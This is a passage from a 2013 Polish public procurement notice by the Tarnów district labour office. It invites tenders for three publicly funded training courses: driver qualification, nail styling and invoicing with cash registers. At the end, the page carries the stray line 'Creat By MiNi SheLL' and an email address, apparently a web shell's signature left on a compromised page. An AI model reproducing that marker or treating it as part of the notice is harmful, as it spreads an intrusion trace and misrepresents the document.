do Zamawiającego niezwłocznie po zaistniałym zdarzeniu;
3) w uzasadnionych przypadkach za zgodą Wykonawcy Zamawiający może zmienić termin rozpoczęcia i zakończenia szkolenia, przy czym warunki dotyczące tygodniowego wymiaru godzin oraz okresu realizacji zamówienia nie mogą ulec zmianie; 
4) Zamawiający przewiduje możliwość zmiany podmiotu, o którym mowa w art. 26 ust 2b ustawy w trakcie realizacji zamówienia pod warunkiem, że wskazany nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o udzielenie zamówienia publicznego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.tarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, 33-100 Tarnów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2013 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, 33-100 Tarnów, sekretariat (pok. 214).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia pn. Kwalifikacja wstępna przyspieszona w zakresie kategorii C, C+E, C1, C1+E dla 30 osób, w trzech grupach po 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Kwalifikacja wstępna przyspieszona w zakresie kategorii C, C+E, C1, C1+E dla 30 osób, w trzech grupach po 10 osób,
2) szkolenie finansowane jest ze środków publicznych,
3) szkolenie musi zostać przeprowadzone zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity: Dz. U. z 2012 r. Nr 0, poz. 1265, z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2010 r. Nr 53 poz. 314).
4) szkolenie winno obejmować 140 godzin zegarowych lub 139 godzin zegarowych (w przypadku, o którym mowa w § 7 ust. 4 cyt. powyżej rozporządzenia), w tym:
a) część podstawową - teoretyczną trwającą minimum 97 godzin,
b) część specjalistyczną prowadzoną w formie:
- zajęć teoretycznych, trwających minimum 33 godziny,
- zajęć praktycznych w ruchu drogowym, podczas których osoba powinna odbyć minimum 8 godzin jazdy indywidualnej oraz 
- zajęć praktycznych z jazdy w warunkach specjalnych, podczas których osoba powinna odbyć minimum 2 godziny jazdy indywidualnej lub w przypadku, gdy ten zakres szkolenia prowadzony będzie przy wykorzystaniu urządzenia, o którym mowa w art. 39g ust. 11 pkt 2cyt. powyżej ustawy - uznaje się równoważne 1 godzinie jazdy,
5) szkolenie winno zakończyć się testem kwalifikacyjnym przeprowadzonym przez komisję egzaminującą powołaną przez wojewodę,
6) absolwent otrzymuje po zdanym egzaminie (teście kwalifikacyjnym) - Świadectwo kwalifikacji zawodowej (zgodnie z § 19 pkt 1 cyt. powyżej rozporządzenia w sprawie szkolenia kierowców wykonujących przewóz drogowy),
7) w przypadku gdy, absolwent nie zaliczy pozytywnie testu kwalifikacyjnego, o którym wyżej mowa wykonawca zobowiązany jest do wydania zaświadczenia o ukończeniu szkolenia zawierającego: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzająca szkolenie;
8) koszt przeprowadzenia testu kwalifikacyjnego pokrywa wykonawca tj. wchodzi w ogólny koszt szkolenia (musi zostać ujęty w kalkulacji kosztów załącznik nr 4 do SIWZ),
9) czas trwania testu kwalifikacyjnego nie wlicza się do liczby godzin szkolenia,
10) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
11) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
12) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
13) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
14) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Efektywność/współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach - 0.10</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia pn. Pielęgnacja 
i stylizacja paznokci dla 10 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Pielęgnacja 
i stylizacja paznokci dla 10 osób, 
2) szkolenie finansowane jest ze środków publicznych, 
3) szkolenie winno obejmować minimum 60 godzin zegarowych zajęć, w tym minimum 50 godzin zajęć praktycznych,
4) program szkolenia winien obejmować w szczególności:
- BHP na stanowisku pracy,
- wyposażenie stanowiska pracy,
- budowa paznokci,
- choroby i fizjologia skóry,
- korekcja wad, 
- manicure kosmetyczny (biologiczny, klasyczny, praca z frezarką, masaż dłoni, parafina, malowanie paznokci w tym french),
- pedicure kosmetyczny (biologiczny, klasyczny, praca z frezarką, parafina, malowanie paznokci w tym french),
- pedicure callus,
- manicure hybrydowy,
- manicure japoński,
- stylizacja paznokci: metoda akrylowa i żelowa UV,
- paznokcie w stylu RUSSIAN STYLE, COMBO,
- wzornictwo,
5) absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy 
i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie,
6) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
7) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
8) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
9) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
10) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Efektywność/wsoółpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach) - 0.10</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia pn. Fakturzysta 
z obsługą kasy fiskalnej dla 30 osób, w dwóch grupach po 15 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Fakturzysta 
z obsługą kasy fiskalnej dla 30 osób, w dwóch grupach po 15 osób,
2) szkolenie finansowane jest ze środków publicznych, 
3) szkolenie winno obejmować minimum 75 godzin zegarowych zajęć, w tym minimum 60 godzin zajęć praktycznych,
4) program szkolenia winien obejmować w szczególności:
- podstawowe wiadomości dotyczące sprzedaży,
- podstawy obsługi komputera,
- obsługę programu do fakturowania FPP,
- wystawianie faktur i paragonów,
- podstawy towaroznawstwa,
- dokumentację handlową i magazynową,
- obsługa kasy fiskalnej,
5) liczba uczestników szkolenia przypadająca na jedno stanowisko praktycznej nauki zawodu wynosi 1 osoba (tj. każda osoba uczestnicząca w szkoleniu musi posiadać do dyspozycji 1 kasę fiskalną oraz 1 stanowisko komputerowe z odpowiednim oprogramowaniem niezbędnym do przeprowadzenia szkolenia),
6) absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy 
i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie,
7) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
8) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
9) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
10) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
11) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.80</li>
<li>2. Efektywność/współpraca (wskaźnik zatrudnienia po dotychczas organizowanych szkoleniach ) - 0.10</li>
<li>3. Certyfikat jakości usług - 0.10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com